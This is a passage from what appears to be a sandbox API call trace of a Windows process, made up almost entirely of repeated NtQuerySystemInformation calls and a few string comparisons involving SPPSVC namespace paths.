ResultLength=0x0) [0287.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0287.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0287.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0287.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0287.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0287.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0287.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0287.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0287.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0288.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0288.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0288.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0288.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0288.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0288.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0288.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0288.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0288.052] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0288.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0288.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0288.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x50, ResultLength=0x0) [0288.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0288.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.059] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0288.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0288.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb50, Length=0x28, ResultLength=0x0) [0288.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0288.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x28, ResultLength=0x0) [0288.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.065] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0288.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0288.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0288.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cab0, Length=0x20, ResultLength=0x0) [0288.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccb0, Length=0x38, ResultLength=0x0) [0288.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb30, Length=0x20, ResultLength=0x0) [0288.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0288.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d220, Length=0x50, ResultLength=0x0) [0288.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d220, Length=0x50, ResultLength=0x0) [0288.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d220, Length=0x50, ResultLength=0x0) [0288.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0288.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0288.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0288.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0288.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.075] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0288.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0288.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0288.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.080] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0288.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0288.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cee0, Length=0x28, ResultLength=0x0) [0288.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0288.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.082] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf60, Length=0x28, ResultLength=0x0) [0288.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.087] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf60, Length=0x28, ResultLength=0x0) [0288.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x20, ResultLength=0x0) [0288.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x20, ResultLength=0x0) [0288.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x20, ResultLength=0x0) [0288.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.088] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd80, Length=0x20, ResultLength=0x0) [0288.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.089] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0288.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d040, Length=0x38, ResultLength=0x0) [0288.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cec0, Length=0x20, ResultLength=0x0) [0288.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x20, ResultLength=0x0) [0288.090] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x20, ResultLength=0x0) [0288.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.091] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x50, ResultLength=0x0) [0288.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x28, ResultLength=0x0) [0288.092] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0288.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x50, ResultLength=0x0) [0288.092] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1b8, Length=0x50, ResultLength=0x0) [0288.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0a0, Length=0x50, ResultLength=0x0) [0288.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d020, Length=0x28, ResultLength=0x0) [0288.093] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0288.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0a0, Length=0x50, ResultLength=0x0) [0288.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.093] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0a0, Length=0x50, ResultLength=0x0) [0288.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0a0, Length=0x50, ResultLength=0x0) [0288.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x38, ResultLength=0x0) [0288.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x28, ResultLength=0x0) [0288.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x28, ResultLength=0x0) [0288.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x28, ResultLength=0x0) [0288.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce70, Length=0x28, ResultLength=0x0) [0288.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x38, ResultLength=0x0) [0288.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x28, ResultLength=0x0) [0288.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x28, ResultLength=0x0) [0288.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x38, ResultLength=0x0) [0288.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x20, ResultLength=0x0) [0288.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x20, ResultLength=0x0) [0288.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x20, ResultLength=0x0) [0288.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x20, ResultLength=0x0) [0288.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfd0, Length=0x38, ResultLength=0x0) [0288.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x20, ResultLength=0x0) [0288.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x20, ResultLength=0x0) [0288.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 